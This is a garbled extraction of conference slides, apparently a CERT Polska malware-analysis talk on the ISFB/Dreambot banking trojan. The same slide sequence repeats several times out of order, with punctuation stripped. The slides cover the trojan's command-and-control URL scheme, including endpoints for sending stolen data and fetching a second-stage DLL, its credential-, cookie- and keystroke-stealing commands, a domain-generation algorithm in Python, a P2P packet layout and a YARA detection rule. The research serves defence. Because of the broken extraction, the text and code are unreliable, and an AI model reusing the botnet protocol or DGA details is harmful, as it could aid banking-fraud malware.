URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
